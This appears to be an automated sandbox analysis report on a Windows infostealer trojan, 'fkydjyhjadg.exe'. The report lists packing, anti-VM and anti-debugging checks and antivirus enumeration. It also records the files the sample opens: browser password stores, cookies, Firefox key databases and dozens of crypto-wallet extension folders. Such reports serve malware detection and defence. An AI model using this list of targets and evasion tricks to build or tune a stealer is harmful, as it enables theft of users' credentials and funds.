              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49715 version: TLS 1.2

              System Summary

              barindex
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_009B3EB60_3_009B3EB6
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_009B40590_3_009B4059
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_009B406B0_3_009B406B
              Source: fkydjyhjadg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: fkydjyhjadg.exeStatic PE information: Section: ZLIB complexity 0.9995601741412213
              Source: fkydjyhjadg.exeStatic PE information: Section: .data ZLIB complexity 0.996925320687773
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/2
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fkydjyhjadg.exe, 00000000.00000003.1445265004.00000000038AC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444994195.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1471205949.00000000038AD000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1471685998.0000000003941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: fkydjyhjadg.exeReversingLabs: Detection: 47%
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile read: C:\Users\user\Desktop\fkydjyhjadg.exeJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: fkydjyhjadg.exeStatic file information: File size 1278464 > 1048576

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeUnpacked PE file: 0.2.fkydjyhjadg.exe.d0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;Unknown_Section5:EW;.data:EW;
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: fkydjyhjadg.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10A20 push edi; iretd 0_3_00A10A21
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10A20 push edi; iretd 0_3_00A10A21
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10A20 push edi; iretd 0_3_00A10A21
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10A20 push edi; iretd 0_3_00A10A21
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10DAF push FFFFFFA5h; iretd 0_3_00A10DB1
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10DAF push FFFFFFA5h; iretd 0_3_00A10DB1
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10DAF push FFFFFFA5h; iretd 0_3_00A10DB1
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10DAF push FFFFFFA5h; iretd 0_3_00A10DB1
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B84 push 61326D4Ah; iretd 0_3_00A10B91
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B84 push 61326D4Ah; iretd 0_3_00A10B91
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B84 push 61326D4Ah; iretd 0_3_00A10B91
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B84 push 61326D4Ah; iretd 0_3_00A10B91
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10F19 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10F19 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A0BA64 push eax; ret 0_3_00A0BA65
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A0BA64 push eax; ret 0_3_00A0BA65
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B74 push 63006E6Fh; iretd 0_3_00A10B81
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B74 push 63006E6Fh; iretd 0_3_00A10B81
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B74 push 63006E6Fh; iretd 0_3_00A10B81
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10B74 push 63006E6Fh; iretd 0_3_00A10B81
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10EA2 push ebp; iretd 0_3_00A10F31
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10DAF push FFFFFFA5h; iretd 0_3_00A10DB1
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10DAF push FFFFFFA5h; iretd 0_3_00A10DB1
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeCode function: 0_3_00A10DAF push FFFFFFA5h; iretd 0_3_00A10DB1
              Source: fkydjyhjadg.exeStatic PE information: section name: entropy: 7.998422403780575
              Source: fkydjyhjadg.exeStatic PE information: section name: entropy: 7.89367915472244
              Source: fkydjyhjadg.exeStatic PE information: section name: entropy: 7.921647567448789
              Source: fkydjyhjadg.exeStatic PE information: section name: entropy: 7.846300396379283
              Source: fkydjyhjadg.exeStatic PE information: section name: .data entropy: 7.977531258783219
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeWindow / User API: threadDelayed 861Jump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exe TID: 7648Thread sleep count: 861 > 30Jump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exe TID: 7672Thread sleep count: 36 > 30Jump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exe TID: 7672Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exe TID: 7708Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exe TID: 7708Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.0000000003944000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: fkydjyhjadg.exe, fkydjyhjadg.exe, 00000000.00000003.1566111992.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.000000000093E000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685369935.00000000009A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.0000000000124000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.0000000000124000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.000000000026E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.000000000026E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.0000000000124000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.000000000026E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: fkydjyhjadg.exe, 00000000.00000003.1470792119.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: fkydjyhjadg.exe, 00000000.00000003.1565866535.000000000391D000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1565986346.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566242035.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1579126128.000000000391D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: fkydjyhjadg.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: fkydjyhjadg.exeString found in binary or memory: Wallets/Electrum-LTC
              Source: fkydjyhjadg.exeString found in binary or memory: Wallets/ElectronCash
              Source: fkydjyhjadg.exeString found in binary or memory: Jaxx Liberty
              Source: fkydjyhjadg.exeString found in binary or memory: window-state.json
              Source: fkydjyhjadg.exeString found in binary or memory: ExodusWeb3
              Source: fkydjyhjadg.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: fkydjyhjadg.exe, 00000000.00000003.1533648242.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
